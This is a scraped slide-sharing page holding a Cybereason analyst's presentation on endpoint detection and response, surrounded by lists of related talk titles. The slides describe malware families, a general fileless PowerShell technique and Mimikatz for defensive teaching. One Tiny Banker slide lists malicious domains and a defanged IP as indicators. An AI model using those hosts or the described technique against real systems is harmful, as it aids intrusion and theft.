DĆ©couvrez le Rugged DevOpsDĆ©couvrez le Rugged DevOps
DĆ©couvrez le Rugged DevOps
Ā 
2017 March ISACA Security Challenges with the Internet of Things - Eric Vande...
2017 March ISACA Security Challenges with the Internet of Things - Eric Vande...2017 March ISACA Security Challenges with the Internet of Things - Eric Vande...
2017 March ISACA Security Challenges with the Internet of Things - Eric Vande...
Ā 
Create a Unified View of Your Application Security Program ā€“ Black Duck Hub a...
Create a Unified View of Your Application Security Program ā€“ Black Duck Hub a...Create a Unified View of Your Application Security Program ā€“ Black Duck Hub a...
Create a Unified View of Your Application Security Program ā€“ Black Duck Hub a...
Ā 
WEBINAR: How To Use Artificial Intelligence To Prevent Insider Threats
WEBINAR: How To Use Artificial Intelligence To Prevent Insider ThreatsWEBINAR: How To Use Artificial Intelligence To Prevent Insider Threats
WEBINAR: How To Use Artificial Intelligence To Prevent Insider Threats
Ā 
Best_of_Breed_3-24-2015_How_to_Achieve_ABAC_Today copy
Best_of_Breed_3-24-2015_How_to_Achieve_ABAC_Today copyBest_of_Breed_3-24-2015_How_to_Achieve_ABAC_Today copy
Best_of_Breed_3-24-2015_How_to_Achieve_ABAC_Today copy
Ā 
Netwatcher Credit Union Tech Talk
Netwatcher Credit Union Tech TalkNetwatcher Credit Union Tech Talk
Netwatcher Credit Union Tech Talk
Ā 
(Isc)Ā² secure johannesburg
(Isc)Ā² secure johannesburg (Isc)Ā² secure johannesburg
(Isc)Ā² secure johannesburg
Ā 
Protecting What Matters Most ā€“ Data
Protecting What Matters Most ā€“ DataProtecting What Matters Most ā€“ Data
Protecting What Matters Most ā€“ Data
Ā 
What Every Developer And Tester Should Know About Software Security
What Every Developer And Tester Should Know About Software SecurityWhat Every Developer And Tester Should Know About Software Security
What Every Developer And Tester Should Know About Software Security
Ā 
Open Source Security for Newbies - Best Practices
Open Source Security for Newbies - Best PracticesOpen Source Security for Newbies - Best Practices
Open Source Security for Newbies - Best Practices
Ā 
What is Network Security and Why is it Needed?
What is Network Security and Why is it Needed?What is Network Security and Why is it Needed?
What is Network Security and Why is it Needed?
Ā 
Donā€™t WannaCry? Hereā€™s How to Stop Those Ransomware Blues
Donā€™t WannaCry? Hereā€™s How to Stop Those Ransomware BluesDonā€™t WannaCry? Hereā€™s How to Stop Those Ransomware Blues
Donā€™t WannaCry? Hereā€™s How to Stop Those Ransomware Blues
Ā 
Next-level mobile app security: A programmatic approach
Next-level mobile app security: A programmatic approachNext-level mobile app security: A programmatic approach
Next-level mobile app security: A programmatic approach
Ā 
Building Blocks of Secure Development: How to Make Open Source Work for You
Building Blocks of Secure Development: How to Make Open Source Work for YouBuilding Blocks of Secure Development: How to Make Open Source Work for You
Building Blocks of Secure Development: How to Make Open Source Work for You
Ā 
Cybersecurity.pptx
Cybersecurity.pptxCybersecurity.pptx
Cybersecurity.pptx
Ā 
Beyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountBeyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked account
Ā 
Cyber security and demonstration of security tools
Cyber security and demonstration of security toolsCyber security and demonstration of security tools
Cyber security and demonstration of security tools
Ā 

More from Dawn Yankeelov

TALK Public Policy 2022
TALK Public Policy 2022TALK Public Policy 2022
TALK Public Policy 2022
Dawn Yankeelov
Ā 
A Look At Evolving Cybersecurity Policy for Financial Institutions 2021
A Look At Evolving Cybersecurity Policy for Financial Institutions 2021A Look At Evolving Cybersecurity Policy for Financial Institutions 2021
A Look At Evolving Cybersecurity Policy for Financial Institutions 2021
Dawn Yankeelov
Ā 
Discussing Guidance & Liabilities Regarding Reopening
Discussing Guidance & Liabilities Regarding ReopeningDiscussing Guidance & Liabilities Regarding Reopening
Discussing Guidance & Liabilities Regarding Reopening
Dawn Yankeelov
Ā 
DHS Cybersecurity Services for Building Cyber Resilience
DHS Cybersecurity Services for Building Cyber ResilienceDHS Cybersecurity Services for Building Cyber Resilience
DHS Cybersecurity Services for Building Cyber Resilience
Dawn Yankeelov
Ā 
Cyber Security Threats Facing Small Businesses--June 2019
Cyber Security Threats Facing Small Businesses--June 2019Cyber Security Threats Facing Small Businesses--June 2019
Cyber Security Threats Facing Small Businesses--June 2019
Dawn Yankeelov
Ā 
A Look at Cyber Insurance -- A Corporate Perspective
A Look at Cyber Insurance -- A Corporate PerspectiveA Look at Cyber Insurance -- A Corporate Perspective
A Look at Cyber Insurance -- A Corporate Perspective
Dawn Yankeelov
Ā 
Cyber Security Resilience by KY CISO David Carter
Cyber Security Resilience by KY CISO David CarterCyber Security Resilience by KY CISO David Carter
Cyber Security Resilience by KY CISO David Carter
Dawn Yankeelov
Ā 
Cyber Security Resilience from Metro Louisville Govt.
Cyber Security Resilience from Metro Louisville Govt. Cyber Security Resilience from Metro Louisville Govt.
Cyber Security Resilience from Metro Louisville Govt.
Dawn Yankeelov
Ā 
Cybersecurity Information From KY's CISO
Cybersecurity Information From KY's CISOCybersecurity Information From KY's CISO
Cybersecurity Information From KY's CISO
Dawn Yankeelov
Ā 
Legal Issues in Data Privacy and Security: Response Readiness Before the Breach
Legal Issues in Data Privacy and Security: Response Readiness Before the BreachLegal Issues in Data Privacy and Security: Response Readiness Before the Breach
Legal Issues in Data Privacy and Security: Response Readiness Before the Breach
Dawn Yankeelov
Ā 
Kentucky's Cyber Enclave
Kentucky's Cyber EnclaveKentucky's Cyber Enclave
Kentucky's Cyber Enclave
Dawn Yankeelov
Ā 
Understanding Cyber Industrial Controls in the Manufacturing and Utilities En...
Understanding Cyber Industrial Controls in the Manufacturing and Utilities En...Understanding Cyber Industrial Controls in the Manufacturing and Utilities En...
Understanding Cyber Industrial Controls in the Manufacturing and Utilities En...
Dawn Yankeelov
Ā 
RCM Brain: AI Bots in Healthcare
RCM Brain: AI Bots in HealthcareRCM Brain: AI Bots in Healthcare
RCM Brain: AI Bots in Healthcare
Dawn Yankeelov
Ā 
Kentucky's Cyber Engineering Pathway for Teens By Scott U'Sellis
Kentucky's Cyber Engineering Pathway for Teens By Scott U'SellisKentucky's Cyber Engineering Pathway for Teens By Scott U'Sellis
Kentucky's Cyber Engineering Pathway for Teens By Scott U'Sellis
Dawn Yankeelov
Ā 
PSST: Seamless Data Solutions
PSST: Seamless Data Solutions PSST: Seamless Data Solutions
PSST: Seamless Data Solutions
Dawn Yankeelov
Ā 
RCM Brain: AI Bots in Healthcare
RCM Brain: AI Bots in Healthcare RCM Brain: AI Bots in Healthcare
RCM Brain: AI Bots in Healthcare
Dawn Yankeelov
Ā 
Cybersecurity Trends & Startups by Gula Tech Adventures
Cybersecurity Trends & Startups by Gula Tech AdventuresCybersecurity Trends & Startups by Gula Tech Adventures
Cybersecurity Trends & Startups by Gula Tech Adventures
Dawn Yankeelov
Ā 
How I Will Phish You
How I Will Phish You How I Will Phish You
How I Will Phish You
Dawn Yankeelov
Ā 
Understanding Research & Development Tax Credits in KY
Understanding Research & Development Tax Credits in KYUnderstanding Research & Development Tax Credits in KY
Understanding Research & Development Tax Credits in KY
Dawn Yankeelov
Ā 
Blockchain: An Explanation by Frost, Brown & Todd Attorneys
Blockchain: An Explanation by Frost, Brown & Todd Attorneys Blockchain: An Explanation by Frost, Brown & Todd Attorneys
Blockchain: An Explanation by Frost, Brown & Todd Attorneys
Dawn Yankeelov
Ā 

More from Dawn Yankeelov (20)

TALK Public Policy 2022
TALK Public Policy 2022TALK Public Policy 2022
TALK Public Policy 2022
Ā 
A Look At Evolving Cybersecurity Policy for Financial Institutions 2021
A Look At Evolving Cybersecurity Policy for Financial Institutions 2021A Look At Evolving Cybersecurity Policy for Financial Institutions 2021
A Look At Evolving Cybersecurity Policy for Financial Institutions 2021
Ā 
Discussing Guidance & Liabilities Regarding Reopening
Discussing Guidance & Liabilities Regarding ReopeningDiscussing Guidance & Liabilities Regarding Reopening
Discussing Guidance & Liabilities Regarding Reopening
Ā 
DHS Cybersecurity Services for Building Cyber Resilience
DHS Cybersecurity Services for Building Cyber ResilienceDHS Cybersecurity Services for Building Cyber Resilience
DHS Cybersecurity Services for Building Cyber Resilience
Ā 
Cyber Security Threats Facing Small Businesses--June 2019
Cyber Security Threats Facing Small Businesses--June 2019Cyber Security Threats Facing Small Businesses--June 2019
Cyber Security Threats Facing Small Businesses--June 2019
Ā 
A Look at Cyber Insurance -- A Corporate Perspective
A Look at Cyber Insurance -- A Corporate PerspectiveA Look at Cyber Insurance -- A Corporate Perspective
A Look at Cyber Insurance -- A Corporate Perspective
Ā 
Cyber Security Resilience by KY CISO David Carter
Cyber Security Resilience by KY CISO David CarterCyber Security Resilience by KY CISO David Carter
Cyber Security Resilience by KY CISO David Carter
Ā 
Cyber Security Resilience from Metro Louisville Govt.
Cyber Security Resilience from Metro Louisville Govt. Cyber Security Resilience from Metro Louisville Govt.
Cyber Security Resilience from Metro Louisville Govt.
Ā 
Cybersecurity Information From KY's CISO
Cybersecurity Information From KY's CISOCybersecurity Information From KY's CISO
Cybersecurity Information From KY's CISO
Ā 
Legal Issues in Data Privacy and Security: Response Readiness Before the Breach
Legal Issues in Data Privacy and Security: Response Readiness Before the BreachLegal Issues in Data Privacy and Security: Response Readiness Before the Breach
Legal Issues in Data Privacy and Security: Response Readiness Before the Breach
Ā 
Kentucky's Cyber Enclave
Kentucky's Cyber EnclaveKentucky's Cyber Enclave
Kentucky's Cyber Enclave
Ā 
Understanding Cyber Industrial Controls in the Manufacturing and Utilities En...
Understanding Cyber Industrial Controls in the Manufacturing and Utilities En...Understanding Cyber Industrial Controls in the Manufacturing and Utilities En...
Understanding Cyber Industrial Controls in the Manufacturing and Utilities En...
Ā 
RCM Brain: AI Bots in Healthcare
RCM Brain: AI Bots in HealthcareRCM Brain: AI Bots in Healthcare
RCM Brain: AI Bots in Healthcare
Ā 
Kentucky's Cyber Engineering Pathway for Teens By Scott U'Sellis
Kentucky's Cyber Engineering Pathway for Teens By Scott U'SellisKentucky's Cyber Engineering Pathway for Teens By Scott U'Sellis
Kentucky's Cyber Engineering Pathway for Teens By Scott U'Sellis
Ā 
PSST: Seamless Data Solutions
PSST: Seamless Data Solutions PSST: Seamless Data Solutions
PSST: Seamless Data Solutions
Ā 
RCM Brain: AI Bots in Healthcare
RCM Brain: AI Bots in Healthcare RCM Brain: AI Bots in Healthcare
RCM Brain: AI Bots in Healthcare
Ā 
Cybersecurity Trends & Startups by Gula Tech Adventures
Cybersecurity Trends & Startups by Gula Tech AdventuresCybersecurity Trends & Startups by Gula Tech Adventures
Cybersecurity Trends & Startups by Gula Tech Adventures
Ā 
How I Will Phish You
How I Will Phish You How I Will Phish You
How I Will Phish You
Ā 
Understanding Research & Development Tax Credits in KY
Understanding Research & Development Tax Credits in KYUnderstanding Research & Development Tax Credits in KY
Understanding Research & Development Tax Credits in KY
Ā 
Blockchain: An Explanation by Frost, Brown & Todd Attorneys
Blockchain: An Explanation by Frost, Brown & Todd Attorneys Blockchain: An Explanation by Frost, Brown & Todd Attorneys
Blockchain: An Explanation by Frost, Brown & Todd Attorneys
Ā 

Recently uploaded

AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)
HarpalGohil4
Ā 
Christine's Product Research Presentation.pptx
Christine's Product Research Presentation.pptxChristine's Product Research Presentation.pptx
Christine's Product Research Presentation.pptx
christinelarrosa
Ā 
GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)
Javier Junquera
Ā 
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
Fwdays
Ā 
A Deep Dive into ScyllaDB's Architecture
A Deep Dive into ScyllaDB's ArchitectureA Deep Dive into ScyllaDB's Architecture
A Deep Dive into ScyllaDB's Architecture
ScyllaDB
Ā 
Session 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdfSession 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdf
UiPathCommunity
Ā 
Apps Break Data
Apps Break DataApps Break Data
Apps Break Data
Ivo Velitchkov
Ā 
Essentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation ParametersEssentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation Parameters
Safe Software
Ā 
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsConnector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
DianaGray10
Ā 
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
DanBrown980551
Ā 
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid ResearchHarnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Neo4j
Ā 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
Antonios Katsarakis
Ā 
Principle of conventional tomography-Bibash Shahi ppt..pptx
Principle of conventional tomography-Bibash Shahi ppt..pptxPrinciple of conventional tomography-Bibash Shahi ppt..pptx
Principle of conventional tomography-Bibash Shahi ppt..pptx
BibashShahi
Ā 
What is an RPA CoE? Session 2 ā€“ CoE Roles
What is an RPA CoE? Session 2 ā€“ CoE RolesWhat is an RPA CoE? Session 2 ā€“ CoE Roles
What is an RPA CoE? Session 2 ā€“ CoE Roles
DianaGray10
Ā 
"What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w..."What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w...
Fwdays
Ā 
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin..."$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
Fwdays
Ā 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
Fwdays
Ā 
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptxPRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
christinelarrosa
Ā 
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
AlexanderRichford
Ā 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
AstuteBusiness
Ā 

Recently uploaded (20)

AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)
Ā 
Christine's Product Research Presentation.pptx
Christine's Product Research Presentation.pptxChristine's Product Research Presentation.pptx
Christine's Product Research Presentation.pptx
Ā 
GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)
Ā 
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
Ā 
A Deep Dive into ScyllaDB's Architecture
A Deep Dive into ScyllaDB's ArchitectureA Deep Dive into ScyllaDB's Architecture
A Deep Dive into ScyllaDB's Architecture
Ā 
Session 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdfSession 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdf
Ā 
Apps Break Data
Apps Break DataApps Break Data
Apps Break Data
Ā 
Essentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation ParametersEssentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation Parameters
Ā 
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsConnector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Ā 
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
Ā 
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid ResearchHarnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Ā 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
Ā 
Principle of conventional tomography-Bibash Shahi ppt..pptx
Principle of conventional tomography-Bibash Shahi ppt..pptxPrinciple of conventional tomography-Bibash Shahi ppt..pptx
Principle of conventional tomography-Bibash Shahi ppt..pptx
Ā 
What is an RPA CoE? Session 2 ā€“ CoE Roles
What is an RPA CoE? Session 2 ā€“ CoE RolesWhat is an RPA CoE? Session 2 ā€“ CoE Roles
What is an RPA CoE? Session 2 ā€“ CoE Roles
Ā 
"What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w..."What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w...
Ā 
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin..."$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
Ā 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
Ā 
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptxPRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
Ā 
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
Ā 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
Ā 

The Case for EDR: What's In Your Toolkit

  • 1. Ā© 2017 Cybereason Inc. All rights reserved. Whatā€™s in your toolkit? The Case for EDR
  • 2. Ā© 2017 Cybereason Inc. All rights reserved. Index ā€¢ This presentation: ā€¢ About Me ā€¢ About Cybereason ā€¢ My Job ā€¢ Disclaimers ā€¢ Products/Vendors ā€¢ Defense In Depth ā€¢ Examples ā€¢ Q/A
  • 3. Ā© 2017 Cybereason Inc. All rights reserved. About me ā€¢ Hometown boy! ā€¢ CAL Alumni 2001 ā€¢ Education ā€¢ USF (Double BA in Poly Sci and Finance) ā€¢ UofL (Post Bac Cert in Accounting) ā€¢ Boston University MET (MS in Comp Sci) ā€¢ Work ā€¢ American Well: Security Analyst (2015) ā€¢ PayPal: Security Engineer (2016-2018) ā€¢ Cybereason: Security/Malware Analyst (2019) ā€¢ Other ā€¢ Jit-Jitsu Whitebelt (Black belt in training)
  • 4. Ā© 2017 Cybereason Inc. All rights reserved. About Cybereason ā€¢ Founded in 2012 by former members of the elite Israeli Defense force 8200 ā€¢ Currently around 500 employees with $100+ million dollars in funding, most from Japanese Softbank ā€¢ Offices in Boston, Tel Aviv, Tokyo, London and Sydney (more coming soon)
  • 5. Ā© 2017 Cybereason Inc. All rights reserved. Whatā€™s my job? ā€¢ Identify the Malware before it spreads ā€¢ Drop unidentified Malware into sandbox ā€¢ Reverse Engineer Malware ā€¢ Triage and make recommendations based on the type of Malware ā€¢ Quarantine vs Re-Image the machine
  • 6. Ā© 2017 Cybereason Inc. All rights reserved. Disclaimer! ā€¢ Iā€™m still learning!!!
  • 7. Ā© 2017 Cybereason Inc. All rights reserved. Other Disclaimer ā€¢ EDR is not meant there is a be all end all solution!
  • 8. Ā© 2017 Cybereason Inc. All rights reserved. Which products? Who are the vendors? Anti-virus Firewall WAF
  • 9. Ā© 2017 Cybereason Inc. All rights reserved. New Generation Products EDR
  • 10. Ā© 2017 Cybereason Inc. All rights reserved. Defense in Depth Recognize this?
  • 11. Ā© 2017 Cybereason Inc. All rights reserved. Defense in Depth The Layers
  • 12. Ā© 2017 Cybereason Inc. All rights reserved. What is EDR? Endpoint Detection and ResponseRemediation ā€¢ Gives a full story ā€¢ Shows behaviors and uses data and predictive analytics to determine malicious behavior ā€¢ Addresses the need for continuous monitoring ā€¢ Combines many tools for a single purpose which empowers the analyst as well as the party to make sure the proper actions are taken ā€¢ In other words its helpful!
  • 13. Ā© 2017 Cybereason Inc. All rights reserved. Attack Lifecycle
  • 14. Ā© 2017 Cybereason Inc. All rights reserved. Different types of Malware
  • 15. Ā© 2017 Cybereason Inc. All rights reserved. APT vs. Commodity Malware WannaCry ā€¢ NSA Leak ā€¢ Eternal Blue & Double Pulsar
  • 16. Ā© 2017 Cybereason Inc. All rights reserved. APT vs. Commodity Malware Stuxnet
  • 17. Ā© 2017 Cybereason Inc. All rights reserved. Types of Malware ā€¢ PUP (potentially unwanted program) ā€¢ Applications that would be considered unwanted despite often having been downloaded by the user. ā€¢ Ransomware ā€¢ Threatens to publish the victim's data or perpetually block access(encrypt) to it unless a ransom is paid.
  • 18. Ā© 2017 Cybereason Inc. All rights reserved. Types of Malware ā€¢ Dropper ā€¢ Malicious code that exists only to download other malicious code. ā€¢ Information-stealing malware ā€¢ Collects information from a victimā€™s computer and usually sends it to the attacker. ā€¢ Rootkit ā€¢ Malicious code designed to conceal the existence of other code.
  • 19. Ā© 2017 Cybereason Inc. All rights reserved. Fileless Malware ā€¢ What is it? ā€¢ Legitimate process being ran in the background ā€¢ Data saved in Registry can be called by wscript ā€¢ Powershell process one liner process base64 etc pushses straight to RAM ā€¢ Calling invoke expression can run via admin and collect and receive data and go undetected to typical AV as this is a legitimate process ā€¢ Using Operating System against itself ā€¢ Cobalt kitty --------------------------ļƒ 
  • 20. Ā© 2017 Cybereason Inc. All rights reserved. Fileless Malware ā€¢ Current Trends ā€¢ 42% of companies surveyed by the Ponemon Institute reported experiencing at least one fileless malware attack in 2017 and 77% of all successful attacks were fileless. (https://digitalguardian.com/blog/what-fileless-malware-or-non-malware-attack- definition-and-best-practices-fileless-malware) ā€¢ In the first half of 2018 there was a 94% increase in fileless malware attacks and 5.2 Powershell attacks per 1000 endpoint according to Threatpost (https://threatpost.com/threatlist- ransomware-attacks-down-fileless-malware-up-in-2018/136962/)
  • 21. Ā© 2017 Cybereason Inc. All rights reserved. Mimikatz ā€¢ What is it? ā€¢ Open source application (Used both by Red team and malicious individuals) to dump clear text authentication credentials ā€¢ By default since windows 8.1 wont spit out clear text passwords (Wdigest)
  • 22. Ā© 2017 Cybereason Inc. All rights reserved. Emotet/Trickbot/Ryuk
  • 23. Ā© 2017 Cybereason Inc. All rights reserved. Emotet/Trickbot/Ryuk
  • 24. Ā© 2017 Cybereason Inc. All rights reserved. Emotet/Trickbot/Ryuk
  • 25. Ā© 2017 Cybereason Inc. All rights reserved. Emotet/Trickbot/Ryuk
  • 26. Ā© 2017 Cybereason Inc. All rights reserved. Emotet/Trickbot/Ryuk
  • 27. Ā© 2017 Cybereason Inc. All rights reserved. Tiny Banker
  • 28. Ā© 2017 Cybereason Inc. All rights reserved. Tiny Banker
  • 29. Ā© 2017 Cybereason Inc. All rights reserved. Tiny Banker The process ran a DNS query to the following: vqwgqnbtectr.pw > 216.218.185[.]162 sucjuv.in > 216.218.185[.]162 hbsnmsmlsvib.in > 216.218.185[.]162 ehhrupqrycm.pw > 216.218.185[.]162 uatuwc.pw > 216.218.185[.]162 fpexkrdtxpfs.in > 216.218.185[.]162 okzhyctznzft.pw > 216.218.185[.]162 zawmg.pw > 216.218.185[.]162 lxpcbahva.pw > 216.218.185[.]162 bifcp.in > 216.218.185[.]162 pojde.in > 216.218.185[.]162 And many many moreā€¦.
  • 30. Ā© 2017 Cybereason Inc. All rights reserved. Tiny Banker
  • 31. Ā© 2017 Cybereason Inc. All rights reserved. Tiny Banker
  • 32. Ā© 2017 Cybereason Inc. All rights reserved. Tiny Banker
  • 33. Ā© 2017 Cybereason Inc. All rights reserved. Tiny Banker
  • 34. Ā© 2017 Cybereason Inc. All rights reserved. Demo https://www.youtube.com/watch?v=Hc7h-rIyd5A
  • 35. Ā© 2017 Cybereason Inc. All rights reserved. Q/A ā€¢ Feedback ā€¢ Joshua.chou@cybereason.com ā€¢ jdudeoflife
  • 36. Ā© 2017 Cybereason Inc. All rights reserved. you.Thank www.cybereason.com